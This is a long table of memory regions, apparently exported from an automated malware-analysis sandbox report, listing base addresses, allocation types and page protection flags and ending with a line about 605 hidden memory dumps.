|
||
|
18D1751E000
|
heap
|
page read and write
|
||
|
2DF8000
|
heap
|
page read and write
|
||
|
229FE587000
|
heap
|
page read and write
|
||
|
18D194D1000
|
heap
|
page read and write
|
||
|
7FFE7CDC4000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CFA2000
|
trusted library allocation
|
page read and write
|
||
|
229E451D000
|
heap
|
page read and write
|
||
|
250D0000
|
direct allocation
|
page read and write
|
||
|
3570000
|
heap
|
page read and write
|
||
|
33C0000
|
heap
|
page read and write
|
||
|
33B0000
|
heap
|
page read and write
|
||
|
229E7F73000
|
trusted library allocation
|
page read and write
|
||
|
774E000
|
stack
|
page read and write
|
||
|
7FFE7CF7A000
|
trusted library allocation
|
page read and write
|
||
|
749B000
|
stack
|
page read and write
|
||
|
18D192D1000
|
heap
|
page read and write
|
||
|
18D19584000
|
heap
|
page read and write
|
||
|
18D192E8000
|
heap
|
page read and write
|
||
|
88E5000
|
trusted library allocation
|
page read and write
|
||
|
229FE530000
|
heap
|
page read and write
|
||
|
7C00000
|
trusted library allocation
|
page read and write
|
||
|
879D000
|
stack
|
page read and write
|
||
|
8AD0000
|
heap
|
page read and write
|
||
|
18D1948F000
|
heap
|
page read and write
|
||
|
229E4558000
|
heap
|
page read and write
|
||
|
371B000
|
heap
|
page read and write
|
||
|
74E0000
|
direct allocation
|
page read and write
|
||
|
18D18F80000
|
heap
|
page read and write
|
||
|
229FE877000
|
heap
|
page read and write
|
||
|
18D193D1000
|
heap
|
page read and write
|
||
|
229E46E0000
|
heap
|
page read and write
|
||
|
18D192FC000
|
heap
|
page read and write
|
||
|
25270000
|
heap
|
page read and write
|
||
|
18D17615000
|
heap
|
page read and write
|
||
|
9990000
|
direct allocation
|
page read and write
|
||
|
18D1758C000
|
heap
|
page read and write
|
||
|
18D175A0000
|
heap
|
page read and write
|
||
|
18D192D7000
|
heap
|
page read and write
|
||
|
7FFE7CFA7000
|
trusted library allocation
|
page read and write
|
||
|
C9415B6000
|
stack
|
page read and write
|
||
|
73CF000
|
stack
|
page read and write
|
||
|
24E90000
|
heap
|
page read and write
|
||
|
9A20000
|
heap
|
page read and write
|
||
|
8E00000
|
trusted library allocation
|
page read and write
|
||
|
8B39000
|
heap
|
page read and write
|
||
|
2C7F000
|
stack
|
page read and write
|
||
|
229E4780000
|
trusted library allocation
|
page read and write
|
||
|
3B4E7FC000
|
stack
|
page read and write
|
||
|
18D17622000
|
heap
|
page read and write
|
||
|
9B77000
|
heap
|
page read and write
|
||
|
229E6BA0000
|
trusted library allocation
|
page read and write
|
||
|
18D19407000
|
heap
|
page read and write
|
||
|
8890000
|
trusted library allocation
|
page read and write
|
||
|
C94240D000
|
stack
|
page read and write
|
||
|
4FEC000
|
trusted library allocation
|
page read and write
|
||
|
18D192EF000
|
heap
|
page read and write
|
||
|
7987000
|
heap
|
page read and write
|
||
|
229E6D95000
|
trusted library allocation
|
page read and write
|
||
|
18D192DC000
|
heap
|
page read and write
|
||
|
3B4E8FE000
|
stack
|
page read and write
|
||
|
18D192D1000
|
heap
|
page read and write
|
||
|
18D19407000
|
heap
|
page read and write
|
||
|
18D193D1000
|
heap
|
page read and write
|
||
|
229E4790000
|
heap
|
page readonly
|
||
|
3694000
|
heap
|
page read and write
|
||
|
7FFE7D110000
|
trusted library allocation
|
page read and write
|
||
|
229E44F0000
|
heap
|
page read and write
|
||
|
745D000
|
stack
|
page read and write
|
||
|
7FFE7CF80000
|
trusted library allocation
|
page execute and read and write
|
||
|
229FE87F000
|
heap
|
page read and write
|
||
|
18D17510000
|
heap
|
page read and write
|
||
|
18D1751A000
|
heap
|
page read and write
|
||
|
18D192D1000
|
heap
|
page read and write
|
||
|
2522E000
|
stack
|
page read and write
|
||
|
229FE525000
|
heap
|
page read and write
|
||
|
36C2000
|
trusted library allocation
|
page read and write
|
||
|
229E4850000
|
heap
|
page read and write
|
||
|
36C0000
|
trusted library allocation
|
page read and write
|
||
|
34DE000
|
unkown
|
page read and write
|
||
|
18D194D1000
|
heap
|
page read and write
|
||
|
18D1931D000
|
heap
|
page read and write
|
||
|
325D000
|
stack
|
page read and write
|
||
|
9920000
|
direct allocation
|
page read and write
|
||
|
33AF000
|
stack
|
page read and write
|
||
|
258B92E0000
|
heap
|
page read and write
|
||
|
C9414F9000
|
stack
|
page read and write
|
||
|
7CC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7D100000
|
trusted library allocation
|
page read and write
|
||
|
18D1941D000
|
heap
|
page read and write
|
||
|
7910000
|
heap
|
page read and write
|
||
|
8A8E000
|
stack
|
page read and write
|
||
|
7FFE7D120000
|
trusted library allocation
|
page read and write
|
||
|
18D194F0000
|
heap
|
page read and write
|
||
|
8AF5000
|
heap
|
page read and write
|
||
|
DCA8000
|
direct allocation
|
page execute and read and write
|
||
|
229FE667000
|
heap
|
page execute and read and write
|
||
|
8B3D000
|
heap
|
page read and write
|
||
|
9B90000
|
heap
|
page read and write
|
||
|
18D175FD000
|
heap
|
page read and write
|
||
|
7C80000
|
trusted library allocation
|
page read and write
|
||
|
B70000
|
direct allocation
|
page read and write
|
||
|
C9418BF000
|
stack
|
page read and write
|
||
|
18D194DB000
|
heap
|
page read and write
|
||
|
883B000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D140000
|
trusted library allocation
|
page read and write
|
||
|
340D000
|
trusted library allocation
|
page execute and read and write
|
||
|
18D19449000
|
heap
|
page read and write
|
||
|
9B7B000
|
heap
|
page read and write
|
||
|
18D193D0000
|
heap
|
page read and write
|
||
|
88A0000
|
heap
|
page read and write
|
||
|
C94230E000
|
stack
|
page read and write
|
||
|
18D17518000
|
heap
|
page read and write
|
||
|
18D19302000
|
heap
|
page read and write
|
||
|
9930000
|
direct allocation
|
page read and write
|
||
|
B4A8000
|
direct allocation
|
page execute and read and write
|
||
|
87F0000
|
trusted library allocation
|
page read and write
|
||
|
894C000
|
stack
|
page read and write
|
||
|
7FFE7D050000
|
trusted library allocation
|
page read and write
|
||
|
18D19584000
|
heap
|
page read and write
|
||
|
25380000
|
remote allocation
|
page read and write
|
||
|
18D19446000
|
heap
|
page read and write
|
||
|
C94147E000
|
stack
|
page read and write
|
||
|
7FFE7CDC2000
|
trusted library allocation
|
page read and write
|
||
|
C1B398F000
|
unkown
|
page read and write
|
||
|
18D194E2000
|
heap
|
page read and write
|
||
|
352E000
|
stack
|
page read and write
|
||
|
18D19302000
|
heap
|
page read and write
|
||
|
7FFE7D0C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D0F0000
|
trusted library allocation
|
page read and write
|
||
|
8ACE000
|
stack
|
page read and write
|
||
|
7C90000
|
trusted library allocation
|
page read and write
|
||
|
8B25000
|
heap
|
page read and write
|
||
|
33D0000
|
trusted library section
|
page read and write
|
||
|
18D1941D000
|
heap
|
page read and write
|
||
|
9900000
|
direct allocation
|
page read and write
|
||
|
9B77000
|
heap
|
page read and write
|
||
|
8820000
|
trusted library allocation
|
page read and write
|
||
|
9B37000
|
heap
|
page read and write
|
||
|
258B9200000
|
heap
|
page read and write
|
||
|
18D17615000
|
heap
|
page read and write
|
||
|
18D17645000
|
heap
|
page read and write
|
||
|
7BD8000
|
remote allocation
|
page execute and read and write
|
||
|
18D193F8000
|
heap
|
page read and write
|
||
|
8ADB000
|
heap
|
page read and write
|
||
|
18D17518000
|
heap
|
page read and write
|
||
|
18D1941D000
|
heap
|
page read and write
|
||
|
3B4E2FE000
|
stack
|
page read and write
|
||
|
18D1952A000
|
heap
|
page read and write
|
||
|
229E683B000
|
trusted library allocation
|
page read and write
|
||
|
229FE660000
|
heap
|
page execute and read and write
|
||
|
229E77A2000
|
trusted library allocation
|
page read and write
|
||
|
4F1F000
|
stack
|
page read and write
|
||
|
18D193F8000
|
heap
|
page read and write
|
||
|
386F000
|
unkown
|
page read and write
|
||
|
229FEBC0000
|
heap
|
page read and write
|
||
|
18D19423000
|
heap
|
page read and write
|
||
|
4DD0000
|
heap
|
page read and write
|
||
|
36F0000
|
heap
|
page readonly
|
||
|
7FFE7CF90000
|
trusted library allocation
|
page execute and read and write
|
||
|
18D19584000
|
heap
|
page read and write
|
||
|
9950000
|
direct allocation
|
page read and write
|
||
|
18D17629000
|
heap
|
page read and write
|
||
|
7B50000
|
trusted library allocation
|
page read and write
|
||
|
7ADE000
|
stack
|
page read and write
|
||
|
C8A8000
|
direct allocation
|
page execute and read and write
|
||
|
7FFE7CDCD000
|
trusted library allocation
|
page execute and read and write
|
||
|
18D17654000
|
heap
|
page read and write
|
||
|
24E0E000
|
stack
|
page read and write
|
||
|
18D175CD000
|
heap
|
page read and write
|
||
|
18D1941D000
|
heap
|
page read and write
|
||
|
7FFE7CFB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CB0000
|
heap
|
page read and write
|
||
|
7A5E000
|
stack
|
page read and write
|
||
|
2550F000
|
stack
|
page read and write
|
||
|
258B9309000
|
heap
|
page read and write
|
||
|
18D19302000
|
heap
|
page read and write
|
||
|
229FE6E0000
|
heap
|
page read and write
|
||
|
229E4865000
|
heap
|
page read and write
|
||
|
18D18EF0000
|
remote allocation
|
page read and write
|
||
|
229E665D000
|
trusted library allocation
|
page read and write
|
||
|
7CD0000
|
heap
|
page read and write
|
||
|
7C7B000
|
stack
|
page read and write
|
||
|
9B7B000
|
heap
|
page read and write
|
||
|
3410000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D150000
|
trusted library allocation
|
page read and write
|
||
|
3610000
|
heap
|
page read and write
|
||
|
8800000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D070000
|
trusted library allocation
|
page read and write
|
||
|
2F18000
|
stack
|
page read and write
|
||
|
7BB0000
|
trusted library allocation
|
page read and write
|
||
|
258B9400000
|
heap
|
page read and write
|
||
|
8B0D000
|
heap
|
page read and write
|
||
|
C94250B000
|
stack
|
page read and write
|
||
|
2F1D000
|
stack
|
page read and write
|
||
|
18D17569000
|
heap
|
page read and write
|
||
|
229E7F83000
|
trusted library allocation
|
page read and write
|
||
|
18D17654000
|
heap
|
page read and write
|
||
|
7FFE7CE7C000
|
trusted library allocation
|
page execute and read and write
|
||
|
36C5000
|
trusted library allocation
|
page execute and read and write
|
||
|
229E4538000
|
heap
|
page read and write
|
||
|
C94248A000
|
stack
|
page read and write
|
||
|
D2A8000
|
direct allocation
|
page execute and read and write
|
||
|
3430000
|
heap
|
page read and write
|
||
|
7822000
|
heap
|
page read and write
|
||
|
32E0000
|
heap
|
page read and write
|
||
|
7FFE7D000000
|
trusted library allocation
|
page read and write
|
||
|
74F0000
|
direct allocation
|
page read and write
|
||
|
9910000
|
direct allocation
|
page read and write
|
||
|
E6A8000
|
direct allocation
|
page execute and read and write
|
||
|
7510000
|
direct allocation
|
page read and write
|
||
|
7FFE7CF60000
|
trusted library allocation
|
page read and write
|
||
|
4EDE000
|
stack
|
page read and write
|
||
|
229E4810000
|
trusted library allocation
|
page read and write
|
||
|
229E45A2000
|
heap
|
page read and write
|
||
|
18D19432000
|
heap
|
page read and write
|
||
|
4E1E000
|
stack
|
page read and write
|
||
|
49D8000
|
remote allocation
|
page execute and read and write
|
||
|
7FFE7CE70000
|
trusted library allocation
|
page read and write
|
||
|
3B4E6FB000
|
stack
|
page read and write
|
||
|
96A8000
|
direct allocation
|
page execute and read and write
|
||
|
7FFE7D060000
|
trusted library allocation
|
page read and write
|
||
|
229E7F7F000
|
trusted library allocation
|
page read and write
|
||
|
8810000
|
trusted library allocation
|
page read and write
|
||
|
229E6407000
|
trusted library allocation
|
page read and write
|
||
|
7A9F000
|
stack
|
page read and write
|
||
|
253FF000
|
stack
|
page read and write
|
||
|
229E44E0000
|
heap
|
page read and write
|
||
|
7E5000
|
heap
|
page read and write
|
||
|
18D192D1000
|
heap
|
page read and write
|
||
|
74D0000
|
direct allocation
|
page read and write
|
||
|
C94193B000
|
stack
|
page read and write
|
||
|
9B77000
|
heap
|
page read and write
|
||
|
BEA8000
|
direct allocation
|
page execute and read and write
|
||
|
8E10000
|
trusted library allocation
|
page read and write
|
||
|
18D19302000
|
heap
|
page read and write
|
||
|
18D194D0000
|
heap
|
page read and write
|
||
|
9A8D000
|
stack
|
page read and write
|
||
|
7FFE7CFA5000
|
trusted library allocation
|
page read and write
|
||
|
9B80000
|
heap
|
page read and write
|
||
|
7FFE7D0B0000
|
trusted library allocation
|
page read and write
|
||
|
229FE894000
|
heap
|
page read and write
|
||
|
18D193F8000
|
heap
|
page read and write
|
||
|
99D0000
|
direct allocation
|
page read and write
|
||
|
342A000
|
trusted library allocation
|
page execute and read and write
|
||
|
C94238E000
|
stack
|
page read and write
|
||
|
34AE000
|
heap
|
page read and write
|
||
|
8A2B000
|
stack
|
page read and write
|
||
|
8FD8000
|
remote allocation
|
page execute and read and write
|
||
|
8E40000
|
direct allocation
|
page read and write
|
||
|
7FFE7CE80000
|
trusted library allocation
|
page execute and read and write
|
||
|
250E0000
|
direct allocation
|
page read and write
|
||
|
2502F000
|
stack
|
page read and write
|
||
|
229E4760000
|
trusted library allocation
|
page read and write
|
||
|
71D8000
|
remote allocation
|
page execute and read and write
|
||
|
229FE520000
|
heap
|
page read and write
|
||
|
18D1758D000
|
heap
|
page read and write
|
||
|
229E6010000
|
heap
|
page read and write
|
||
|
229E7F5F000
|
trusted library allocation
|
page read and write
|
||
|
18D19407000
|
heap
|
page read and write
|
||
|
25190000
|
heap
|
page read and write
|
||
|
79E9000
|
heap
|
page read and write
|
||
|
18D175AD000
|
heap
|
page read and write
|
||
|
18D1760C000
|
heap
|
page read and write
|
||
|
5F91000
|
trusted library allocation
|
page read and write
|
||
|
18D18EF0000
|
remote allocation
|
page read and write
|
||
|
229FE620000
|
heap
|
page execute and read and write
|
||
|
18D19432000
|
heap
|
page read and write
|
||
|
7FFE7D020000
|
trusted library allocation
|
page read and write
|
||
|
C94127E000
|
stack
|
page read and write
|
||
|
18D17622000
|
heap
|
page read and write
|
||
|
9B3C000
|
heap
|
page read and write
|
||
|
18D1751C000
|
heap
|
page read and write
|
||
|
18D19302000
|
heap
|
page read and write
|
||
|
18D19423000
|
heap
|
page read and write
|
||
|
229FE872000
|
heap
|
page read and write
|
||
|
3693000
|
heap
|
page read and write
|
||
|
250F0000
|
direct allocation
|
page read and write
|
||
|
4E9E000
|
stack
|
page read and write
|
||
|
18D192F7000
|
heap
|
page read and write
|
||
|
8B1A000
|
heap
|
page read and write
|
||
|
229E6667000
|
trusted library allocation
|
page read and write
|
||
|
2F90000
|
heap
|
page read and write
|
||
|
7C10000
|
trusted library allocation
|
page read and write
|
||
|
7C30000
|
trusted library allocation
|
page read and write
|
||
|
3513000
|
heap
|
page read and write
|
||
|
18D1751D000
|
heap
|
page read and write
|
||
|
18D19432000
|
heap
|
page read and write
|
||
|
7919000
|
heap
|
page read and write
|
||
|
87DE000
|
stack
|
page read and write
|
||
|
98F0000
|
direct allocation
|
page read and write
|
||
|
18D193F8000
|
heap
|
page read and write
|
||
|
85D8000
|
remote allocation
|
page execute and read and write
|
||
|
8830000
|
trusted library allocation
|
page read and write
|
||
|
18D192E0000
|
heap
|
page read and write
|
||
|
229FE701000
|
heap
|
page read and write
|
||
|
C9416B9000
|
stack
|
page read and write
|
||
|
18D1760A000
|
heap
|
page read and write
|
||
|
7D0000
|
heap
|
page read and write
|
||
|
9550000
|
direct allocation
|
page execute and read and write
|
||
|
18D17654000
|
heap
|
page read and write
|
||
|
7FFE7CEA6000
|
trusted library allocation
|
page execute and read and write
|
||
|
18D17515000
|
heap
|
page read and write
|
||
|
7FFE7D010000
|
trusted library allocation
|
page read and write
|
||
|
18D19432000
|
heap
|
page read and write
|
||
|
7FFE7CDC0000
|
trusted library allocation
|
page read and write
|
||
|
8E50000
|
direct allocation
|
page read and write
|
||
|
50E8000
|
trusted library allocation
|
page read and write
|
||
|
229FE858000
|
heap
|
page read and write
|
||
|
7B20000
|
trusted library allocation
|
page read and write
|
||
|
251EE000
|
stack
|
page read and write
|
||
|
229FE5DA000
|
heap
|
page read and write
|
||
|
229FE60A000
|
heap
|
page read and write
|
||
|
9B7B000
|
heap
|
page read and write
|
||
|
4D50000
|
heap
|
page execute and read and write
|
||
|
7520000
|
direct allocation
|
page read and write
|
||
|
C9410FD000
|
stack
|
page read and write
|
||
|
3E80000
|
remote allocation
|
page execute and read and write
|
||
|
9B3C000
|
heap
|
page read and write
|
||
|
C9413FE000
|
stack
|
page read and write
|
||
|
229E7F71000
|
trusted library allocation
|
page read and write
|
||
|
5DD8000
|
remote allocation
|
page execute and read and write
|
||
|
229FE585000
|
heap
|
page read and write
|
||
|
98E0000
|
direct allocation
|
page read and write
|
||
|
7B40000
|
trusted library allocation
|
page read and write
|
||
|
336E000
|
stack
|
page read and write
|
||
|
229E6D68000
|
trusted library allocation
|
page read and write
|
||
|
18D19432000
|
heap
|
page read and write
|
||
|
77CE000
|
stack
|
page read and write
|
||
|
2544C000
|
stack
|
page read and write
|
||
|
229E6120000
|
heap
|
page execute and read and write
|
||
|
8A30000
|
heap
|
page read and write
|
||
|
18D19302000
|
heap
|
page read and write
|
||
|
229E4581000
|
heap
|
page read and write
|
||
|
18D175FD000
|
heap
|
page read and write
|
||
|
18D17654000
|
heap
|
page read and write
|
||
|
7FFE7CFD0000
|
trusted library allocation
|
page read and write
|
||
|
850000
|
heap
|
page read and write
|
||
|
18D194FD000
|
heap
|
page read and write
|
||
|
229FE58F000
|
heap
|
page read and write
|
||
|
BA47000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CEE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
9AA0000
|
heap
|
page read and write
|
||
|
8840000
|
trusted library allocation
|
page read and write
|
||
|
229E47D0000
|
trusted library allocation
|
page read and write
|
||
|
18D17380000
|
heap
|
page read and write
|
||
|
229E8078000
|
trusted library allocation
|
page read and write
|
||
|
778F000
|
stack
|
page read and write
|
||
|
7FFE7D130000
|
trusted library allocation
|
page read and write
|
||
|
229E453F000
|
heap
|
page read and write
|
||
|
8D70000
|
trusted library allocation
|
page read and write
|
||
|
C9411FE000
|
stack
|
page read and write
|
||
|
9B3F000
|
heap
|
page read and write
|
||
|
99B0000
|
direct allocation
|
page read and write
|
||
|
18D194D9000
|
heap
|
page read and write
|
||
|
229F61E1000
|
trusted library allocation
|
page read and write
|
||
|
34B8000
|
heap
|
page read and write
|
||
|
8A0000
|
heap
|
page read and write
|
||
|
3B4EAFB000
|
stack
|
page read and write
|
||
|
229E44FD000
|
heap
|
page read and write
|
||
|
7FFE7D0D0000
|
trusted library allocation
|
page read and write
|
||
|
18D19580000
|
heap
|
page read and write
|
||
|
18D17625000
|
heap
|
page read and write
|
||
|
24FEE000
|
stack
|
page read and write
|
||
|
2FDE000
|
stack
|
page read and write
|
||
|
4F80000
|
heap
|
page read and write
|
||
|
70E000
|
stack
|
page read and write
|
||
|
18D194EE000
|
heap
|
page read and write
|
||
|
229E6674000
|
trusted library allocation
|
page read and write
|
||
|
4D38000
|
trusted library allocation
|
page read and write
|
||
|
258B9420000
|
heap
|
page read and write
|
||
|
24DCE000
|
stack
|
page read and write
|
||
|
229E4545000
|
heap
|
page read and write
|
||
|
18D192EC000
|
heap
|
page read and write
|
||
|
32E9000
|
heap
|
page read and write
|
||
|
367B000
|
heap
|
page read and write
|
||
|
3B4E1FE000
|
stack
|
page read and write
|
||
|
9B42000
|
heap
|
page read and write
|
||
|
5978000
|
trusted library allocation
|
page read and write
|
||
|
5FB9000
|
trusted library allocation
|
page read and write
|
||
|
229E7EF6000
|
trusted library allocation
|
page read and write
|
||
|
99C0000
|
direct allocation
|
page read and write
|
||
|
3B4E4FE000
|
stack
|
page read and write
|
||
|
18D19302000
|
heap
|
page read and write
|
||
|
229E6678000
|
trusted library allocation
|
page read and write
|
||
|
9B2A000
|
heap
|
page read and write
|
||
|
C94173F000
|
stack
|
page read and write
|
||
|
229F61F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D090000
|
trusted library allocation
|
page read and write
|
||
|
74B0000
|
direct allocation
|
page read and write
|
||
|
8850000
|
trusted library allocation
|
page read and write
|
||
|
98D0000
|
direct allocation
|
page read and write
|
||
|
7FFE7D0E0000
|
trusted library allocation
|
page read and write
|
||
|
C941073000
|
stack
|
page read and write
|
||
|
7B60000
|
trusted library allocation
|
page read and write
|
||
|
18D1763C000
|
heap
|
page read and write
|
||
|
3403000
|
trusted library allocation
|
page execute and read and write
|
||
|
18D19581000
|
heap
|
page read and write
|
||
|
18D1941D000
|
heap
|
page read and write
|
||
|
8D60000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CE76000
|
trusted library allocation
|
page read and write
|
||
|
7E0000
|
heap
|
page read and write
|
||
|
99E0000
|
direct allocation
|
page read and write
|
||
|
7FFE7CF71000
|
trusted library allocation
|
page read and write
|
||
|
4F40000
|
heap
|
page execute and read and write
|
||
|
18D194D4000
|
heap
|
page read and write
|
||
|
C941838000
|
stack
|
page read and write
|
||
|
5F9B000
|
trusted library allocation
|
page read and write
|
||
|
9B35000
|
heap
|
page read and write
|
||
|
C94153F000
|
stack
|
page read and write
|
||
|
81D000
|
stack
|
page read and write
|
||
|
7C0000
|
heap
|
page readonly
|
||
|
32E5000
|
heap
|
page read and write
|
||
|
18D19407000
|
heap
|
page read and write
|
||
|
5FFB000
|
trusted library allocation
|
page read and write
|
||
|
229E47A0000
|
trusted library allocation
|
page read and write
|
||
|
18D192D1000
|
heap
|
page read and write
|
||
|
18D1943F000
|
heap
|
page read and write
|
||
|
7FFE7CFE0000
|
trusted library allocation
|
page read and write
|
||
|
18D194FA000
|
heap
|
page read and write
|
||
|
229E6DA2000
|
trusted library allocation
|
page read and write
|
||
|
229E61D5000
|
heap
|
page read and write
|
||
|
9980000
|
direct allocation
|
page read and write
|
||
|
18D1954F000
|
heap
|
page read and write
|
||
|
18D192D0000
|
heap
|
page read and write
|
||
|
7FFE7D040000
|
trusted library allocation
|
page read and write
|
||
|
87E0000
|
heap
|
page read and write
|
||
|
343D000
|
heap
|
page read and write
|
||
|
18D19423000
|
heap
|
page read and write
|
||
|
7C20000
|
trusted library allocation
|
page execute and read and write
|
||
|
18D193F4000
|
heap
|
page read and write
|
||
|
18D19462000
|
heap
|
page read and write
|
||
|
229E61E1000
|
trusted library allocation
|
page read and write
|
||
|
738E000
|
stack
|
page read and write
|
||
|
9B39000
|
heap
|
page read and write
|
||
|
C94117E000
|
stack
|
page read and write
|
||
|
8D4C000
|
stack
|
page read and write
|
||
|
229E6265000
|
trusted library allocation
|
page read and write
|
||
|
18D194E2000
|
heap
|
page read and write
|
||
|
C1B3C7E000
|
stack
|
page read and write
|
||
|
18D193F4000
|
heap
|
page read and write
|
||
|
780F000
|
stack
|
page read and write
|
||
|
7500000
|
direct allocation
|
page read and write
|
||
|
4E5C000
|
stack
|
page read and write
|
||
|
2EDC000
|
stack
|
page read and write
|
||
|
7560000
|
direct allocation
|
page read and write
|
||
|
C1B390B000
|
stack
|
page read and write
|
||
|
229E61D0000
|
heap
|
page read and write
|
||
|
18D17615000
|
heap
|
page read and write
|
||
|
18D17622000
|
heap
|
page read and write
|
||
|
7FFE7D0A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D080000
|
trusted library allocation
|
page read and write
|
||
|
18D17519000
|
heap
|
page read and write
|
||
|
74A0000
|
direct allocation
|
page read and write
|
||
|
229E4520000
|
heap
|
page read and write
|
||
|
18D175D9000
|
heap
|
page read and write
|
||
|
3B4E5FE000
|
stack
|
page read and write
|
||
|
18D194E2000
|
heap
|
page read and write
|
||
|
3B4E0FA000
|
stack
|
page read and write
|
||
|
798A000
|
heap
|
page read and write
|
||
|
396F000
|
stack
|
page read and write
|
||
|
4DD8000
|
heap
|
page read and write
|
||
|
7B1D000
|
stack
|
page read and write
|
||
|
4F70000
|
heap
|
page execute and read and write
|
||
|
18D17480000
|
heap
|
page read and write
|
||
|
25380000
|
remote allocation
|
page read and write
|
||
|
18D19407000
|
heap
|
page read and write
|
||
|
3463000
|
heap
|
page read and write
|
||
|
229E4541000
|
heap
|
page read and write
|
||
|
258B9300000
|
heap
|
page read and write
|
||
|
79DF000
|
heap
|
page read and write
|
||
|
7FFE7CFF0000
|
trusted library allocation
|
page read and write
|
||
|
346F000
|
heap
|
page read and write
|
||
|
18D194E3000
|
heap
|
page read and write
|
||
|
7FFE7D030000
|
trusted library allocation
|
page read and write
|
||
|
9A26000
|
heap
|
page read and write
|
||
|
7B0000
|
heap
|
page read and write
|
||
|
18D19582000
|
heap
|
page read and write
|
||
|
8E30000
|
trusted library allocation
|
page read and write
|
||
|
18D192D1000
|
heap
|
page read and write
|
||
|
7BA0000
|
trusted library allocation
|
page read and write
|
||
|
2DF0000
|
heap
|
page read and write
|
||
|
7929000
|
heap
|
page read and write
|
||
|
3419000
|
trusted library allocation
|
page read and write
|
||
|
3710000
|
heap
|
page read and write
|
||
|
8D0E000
|
stack
|
page read and write
|
||
|
C9412FD000
|
stack
|
page read and write
|
||
|
18D192E3000
|
heap
|
page read and write
|
||
|
2C3E000
|
stack
|
page read and write
|
||
|
335D000
|
stack
|
page read and write
|
||
|
229F64A1000
|
trusted library allocation
|
page read and write
|
||
|
3694000
|
heap
|
page read and write
|
||
|
33E0000
|
trusted library section
|
page read and write
|
||
|
253BE000
|
stack
|
page read and write
|
||
|
229E69E6000
|
trusted library allocation
|
page read and write
|
||
|
229E7F94000
|
trusted library allocation
|
page read and write
|
||
|
7530000
|
direct allocation
|
page read and write
|
||
|
7FFE7CFC0000
|
trusted library allocation
|
page read and write
|
||
|
730E000
|
stack
|
page read and write
|
||
|
18D192D1000
|
heap
|
page read and write
|
||
|
18D19432000
|
heap
|
page read and write
|
||
|
18D19302000
|
heap
|
page read and write
|
||
|
18D192F4000
|
heap
|
page read and write
|
||
|
7CE0000
|
heap
|
page read and write
|
||
|
4F45000
|
heap
|
page execute and read and write
|
||
|
18D1952B000
|
heap
|
page read and write
|
||
|
18D17619000
|
heap
|
page read and write
|
||
|
9AD4000
|
heap
|
page read and write
|
||
|
7BF0000
|
trusted library allocation
|
page read and write
|
||
|
9B42000
|
heap
|
page read and write
|
||
|
229E8172000
|
trusted library allocation
|
page read and write
|
||
|
18D19302000
|
heap
|
page read and write
|
||
|
7B90000
|
trusted library allocation
|
page read and write
|
||
|
9970000
|
direct allocation
|
page read and write
|
||
|
7DF4AE2E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
67D8000
|
remote allocation
|
page execute and read and write
|
||
|
18D17618000
|
heap
|
page read and write
|
||
|
7DD000
|
stack
|
page read and write
|
||
|
18D193DD000
|
heap
|
page read and write
|
||
|
3670000
|
heap
|
page read and write
|
||
|
8B29000
|
heap
|
page read and write
|
||
|
2514D000
|
stack
|
page read and write
|
||
|
7B28000
|
trusted library allocation
|
page read and write
|
||
|
9B90000
|
heap
|
page read and write
|
||
|
229E46C0000
|
heap
|
page read and write
|
||
|
A0A8000
|
direct allocation
|
page execute and read and write
|
||
|
3FD8000
|
remote allocation
|
page execute and read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
C9417BE000
|
stack
|
page read and write
|
||
|
8DBD000
|
stack
|
page read and write
|
||
|
5FA1000
|
trusted library allocation
|
page read and write
|
||
|
734E000
|
stack
|
page read and write
|
||
|
8DFC000
|
stack
|
page read and write
|
||
|
9B7B000
|
heap
|
page read and write
|
||
|
258B9425000
|
heap
|
page read and write
|
||
|
890000
|
heap
|
page read and write
|
||
|
7BD0000
|
trusted library allocation
|
page read and write
|
||
|
3404000
|
trusted library allocation
|
page read and write
|
||
|
18D1751E000
|
heap
|
page read and write
|
||
|
7F780000
|
trusted library allocation
|
page execute and read and write
|
||
|
9940000
|
direct allocation
|
page read and write
|
||
|
18D192D4000
|
heap
|
page read and write
|
There are 605 hidden memdumps, click here to show them.